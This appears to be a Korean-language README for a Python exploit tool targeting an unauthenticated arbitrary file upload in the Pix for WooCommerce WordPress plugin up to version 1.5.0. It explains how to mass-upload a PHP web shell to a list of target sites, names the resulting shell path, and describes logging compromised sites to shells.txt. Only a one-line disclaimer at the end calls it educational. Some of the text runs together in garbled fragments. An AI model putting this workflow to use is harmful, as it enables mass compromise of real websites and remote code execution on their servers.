
Pix for WooCommerce <= 1.5.0 - 인증되지 않은 임의 파일 업로드
Pix for WooCommerce <= 1.5.0 - 인증되지 않은 임의 파일 업로드
Pix for WooCommerce WordPress 플러그인은 다음 이유로 인증되지 않은 임의 파일 업로드에 취약합니다:
lkn_pix_for_woocommerce_c6_save_settings 함수의 1.5.0 이하 모든 버전에서 발생합니다.
이로 인해 원격의 인증되지 않은 공격자가 임의 파일을 업로드하여 **원격 코드 실행(RCE)**으로 이어질 수 있습니다.
CVE-2026-38919.8 (치명적)CVE-2026-3891.py@Kxploitpip install requests rich
다음 파일을 생성하세요:
list.txt
예시:
http://example.com
https://target.com
victim-site.com
프로토콜이 없는 경우 → 스크립트가 자동으로
http://를 추가합니다
셸 파일을 같은 디렉터리에 넣으세요:
shell.php
python3 CVE-2026-3891.py
스크립트가 다음 항목을 묻습니다:
list.txt)8)shell.php)/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/<shell>.php
FAIL http://target.com (reason)
shells.txt
Progress 5/20 OK:3 FAIL:2
이 프로젝트는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다.
Nxploited